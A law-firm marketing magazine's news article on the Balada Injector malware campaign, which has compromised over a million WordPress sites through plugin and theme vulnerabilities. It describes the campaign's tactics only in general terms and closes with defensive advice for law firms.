WordPress Security Breach Used Vulnerabilities in Plugins in Themes
BY Bigger Law Firm Magazine
- Over 1 million sites have been affected by the Balada Injector since 2017.
- The malware allows attackers to generate fake WordPress admin users.
- The report underscores the importance of keeping plugins and themes updated.
Over one million WordPress websites have been infected by a malware campaign called Balada Injector since 2017, according to cybersecurity firm GoDaddy's Sucuri. The attackers behind the campaign use all known and recently discovered vulnerabilities in WordPress themes and plugins to breach sites. They typically play out their attacks in waves once every few weeks, making them difficult to detect. The Balada Injector campaign is characterized by its use of String.fromCharCode obfuscation, freshly registered domain names that host malicious scripts on random subdomains, and redirects to various scam sites.
The malware allows attackers to generate fake WordPress admin users, harvest data stored on hosts, and leave backdoors for persistent access. It also carries out broad searches from top-level directories associated with the compromised website's file system to locate writable directories that belong to other sites. In this manner, just one compromised site can potentially grant access to several other sites for free.
WordPress users are recommended to keep their website software up-to-date, remove unused plugins and themes, and use strong WordPress admin passwords. If these attack pathways are unavailable, attackers brute-force the admin password using a set of 74 predefined credentials.
These findings come on the heels of a similar malicious JavaScript injection campaign that redirects site visitors to adware and scam pages. Over 51,000 websites have been affected since 2022. The campaign also employs String.fromCharCode as an obfuscation technique, leading victims to booby-trapped pages that trick them into enabling push notifications by masquerading as a fake CAPTCHA check to serve deceptive content.
The lesson here is clear: law firms must keep their WordPress plugins up-to-date and ensure their website is protected against these types of attacks. This includes using strong passwords, removing unused plugins and themes, and regularly backing up site data.
LATEST STORIES
MORE STORIES
How to Get Local News Outlets to Cover Your Law Firm’s Big Case
Reaching out to local news outlets is a strategic move for law firm marketing directors aiming to enhance their firm’s visibility and establish its members as thought leaders in their practice areas. This article will guide law firm marketing directors through the process of engaging local news outlets to cover new cases, offering practical advice…
What are the best live chat services for lawyers?
Your law firm has invested hundreds of thousands of dollars to get people to your website. Once their, you have to make it easy to contact your firm and that means offering more than just a contact form and phone number. Live chat services can help connect you to prospective clients who are ready to…
The 4 Best Law-related Movies That All Young Lawyers Should Watch
We asked legal professionals from various fields to share their favorite law-related movies and the valuable lessons young lawyers can learn from them. To Kill a Mockingbird (1962) In the deeply segregated town of Maycomb, Alabama, during the 1930s, “To Kill a Mockingbird” tells the poignant tale of Scout Finch, a young girl caught in…